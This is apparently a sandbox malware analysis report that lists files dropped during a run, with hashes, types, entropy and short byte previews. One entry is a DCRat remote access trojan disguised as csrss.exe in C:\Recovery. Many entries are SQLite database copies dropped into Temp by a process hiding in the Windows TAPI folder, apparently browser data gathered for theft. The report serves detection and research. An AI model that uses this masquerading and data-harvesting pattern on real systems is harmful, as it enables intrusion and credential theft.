                                                                                                                                                                        Preview:ggBKXvNnCObyLzVikoBuYB5jUL1DoZlGyEDTMvK9khltDvrs4wTpF54flc0M4J8nnUAGwBVzeCK0aLfjeJI2F5A2Jisu57Eaj7Gtuk52aeLDvDFZ7RsvBGirUH7OTl3g7tRcFwy4NPbku7GGcSxoPTYcZYYnmrjzkoGBwmTKcyiwp76WB1vByPRoUyCrXLRfqlAG1ETz9mLaumxccClv6hAVXbr7kmxRhCFD70f6h5CME13rAkOVjfiIkpsZXWPWy33rhuelgpOAfyQfi969XcsCe6cSHFiLppXL7LKQGny3QinvYM1YZQ8WK1NkRMdaHDUz

                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                        Entropy (8bit):1.307351937440065
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvre:KooCEYhgYEL0In
                                                                                                                                                                        MD5:05EEF47FF622703720FCEF8C3141D4EB
                                                                                                                                                                        SHA1:8A4B99D7EBF6985F9BC8D0373CD7F09BB19379C6
                                                                                                                                                                        SHA-256:CF3D9ECD03159A5D32EF6D529681FC4EFBB5C7E140F5E4628E392064BF7A206A
                                                                                                                                                                        SHA-512:90B3D72FA8F920CEAB079B27D69DB1FFB8C2D959F059BC54835134087450B1495860D1DB9A936EAA96BD868288F313B70974A31BE8B21E35E1902424C35179F9
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8c974f07, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                                        Entropy (8bit):0.42216716764723916
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                                                                                                                        MD5:5F87CAB3534B090C778A2AF75F6E98C0
                                                                                                                                                                        SHA1:6A154D9D61977A8EAF7534D819BFE1A86AA94530
                                                                                                                                                                        SHA-256:62BCAFDBCFA0DF4F454EEDA0D8E336519E511FA3E72BCC4012C43FA364059D43
                                                                                                                                                                        SHA-512:D84141872059E244EE4C2260A0AC9677E7E411A6EAD48AB2BB72A68B9F1A58BB00CB5D49C66BBD3A374CF7B0DDE55ED573499ED3F740949E334B5CB19E689E41
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..O.... .......A.......X\...;...{......................0.!..........{A.+9...}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................I@.+9...}}..................)..+9...}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                        File Type:OpenPGP Public Key
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                        Entropy (8bit):0.07688828236553058
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:eryKYe5VkY0aukjn13a/HePmk3/l/lollcVO/lnlZMxZNQl:eryKz5VkYFv53qomiGOewk
                                                                                                                                                                        MD5:9E63E1EC350851FE511B2D6A53D6CFEE
                                                                                                                                                                        SHA1:8B62E4189718D9713E1B4EE5376DD9522B5518C3
                                                                                                                                                                        SHA-256:0E5B3B8DA0D374C93EB4D144C2D57826E2AA4C76D152ADF9E234630E28726C26
                                                                                                                                                                        SHA-512:D556DD88D99D138E886ED01718C2E37C9744B4B2011F728A5A1F71CC2A74217237F103784AAB73B6993CBF21DB6F602B336069C7416DB6DD1A5D87909882D72A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.j.......................................;...{..+9...}.......{A..............{A......{A..........{A].................)..+9...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Recovery\886983d96e3d3e

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (680), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):680
                                                                                                                                                                        Entropy (8bit):5.896280632150148
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:b9Vi6IUQcS2wEeMr3tJmDNDsbEcQHq63iRvKdDOls1iPPsIix4FOQ+W5BMYw3oVN:h06H02wEbuNxq63i0Gt8fqOQBTpf
                                                                                                                                                                        MD5:5E0F8EC42F058DF45582F0FF536F0281
                                                                                                                                                                        SHA1:1DA02966C0412F6114E19440E5E54A25E7B450CD
                                                                                                                                                                        SHA-256:00D91A1D92D51586F603500C91A208CB48F063F748308AD9C984119BB150A320
                                                                                                                                                                        SHA-512:2078D6C9507260154AC650E89D564694972A4D7565434C052EA6D8331C62A014643EC8A795CDF3233B1E093FCD8E91D7F4EDD9518441A8350409F825A26F35AA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:3unzv5Tq34OKvZqAAG7j93JXwNNxUToejtXOtVFRRkSjM7R5IaEbYPq9kQCisgWkPtkCBcRoBqSZkkLz5Ro3ONGUCXncThjvNsTcWP3qJaas6RZAENmb1dWBnP9nyyVdHhL1QscqX8uyxXYv8nYF5H3uWRzHPQ2UE6lYGhuWu6D3siOP1OoLaPi9oaf82VaHFZt0w9pb3BV9DAByDkPBlq4yYmupBveYf6xTyXc1iNSZ4j5oYr5SFZgZf4cKP9aIh6dHMs9qHYcXYe4zqGQUzLTFaYx34SmiwK27FxbqrPKr7IAAAndItGSVnYrx4Gvyv3lOm6t2ojmkBlIRYx3Rydzq1hUrGnwldV5DhvYD4kdJdrUBPZZHNeARE4XFmCwBxBGpqFumYzWO9pNKNSbrNoY9Vn9nYSb1ycVbkoVKpwsXHvSYqM2TkExInHTCGHOGXfZhUvji7RCb6A1jVk6LaHRtpNycVSEiimAmWuE4nUWTCVMmQtqfKDqPNp1G7GMoNe2UAPNkgChFv8qTALMmmjXf6uYq377hHrFid2mAfF8IfkeP8hFv3kCoGXXQ0grjEA7D2I0IjMGgkP9VPJsW1LnhpbcFeWK9YZDemaW0q7MrdgD0XCAryUr3XaYapvoMBHHLMftzw1p486EJYlrcWcLErJGMB5K5S9pWY1o2

                                                                                                                                                                        C:\Recovery\csrss.exe

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2615296
                                                                                                                                                                        Entropy (8bit):4.63674531088187
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:KTcFTujpEPnECw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtINz6t1:4cFcWPnyMcQmQmqycMxFNyN
                                                                                                                                                                        MD5:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        SHA1:87D030319ECAB583FB3B68F152C10D780A4BA757
                                                                                                                                                                        SHA-256:EE08091F6FBCA8BFF62F6C75CE5BB74CF86BDF8ACF80D2497C399F01FCBDE59D
                                                                                                                                                                        SHA-512:009B86BD2684B3CEE328F3A0869ABCF3D16F4812E5D74D1A11664A490A22C51C5C5DEAF9561CCD50618111C57173435A7ADBBE6EADFE6AFFEEA50D63C1AD3227
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\csrss.exe, Author: Joe Security
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......'...........'.. ....(...@.. .......................@(.....\;(...@...................................'.K.....(.p.................... (...................................................... ............... ..H............text.....'.. ....'................. ..`.rsrc...p.....(.......'.............@..@.reloc....... (.......'.............@..B..................'.....H........... ,#.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hypersurrogateComponentdhcp.exe.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1698
                                                                                                                                                                        Entropy (8bit):5.367720686892084
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4x
                                                                                                                                                                        MD5:5E2B46F197ED0B7FCCD1F26C008C2CD1
                                                                                                                                                                        SHA1:17B1F616C3D13F341565C71A7520BD788BCCC07D
                                                                                                                                                                        SHA-256:AF902415FD3BA2B023D7ACE463D9EB77114FC3678073C0FFD66A1728578FD265
                                                                                                                                                                        SHA-512:5E6CEEFD6744B078ADA7E188AEC87CD4EE7FDAD5A9CC661C8217AC0A177013370277A381DFE8FF2BC237F48A256E1144223451ED2EC292C00811C14204993B50
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                        Entropy (8bit):1.1510207563435464
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                                                                                                        MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                                                                                                        SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                                                                                                        SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                                                                                                        SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:@...e................................................@..........

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\0ALzj1yHJy

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\0L2Bb69dNB

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\0ORzIIf0AC

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\0OwE4Zdpvt

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\2FmGjCCHbl

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\2UvSiNVewK

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\2XoTyFvQT3

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\2z6mgJVEjN

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\3LuDTXJuCP

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\3OSH4Es4Ta

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\3PjzXuV63Y

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\3Vqk4pfxDS

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
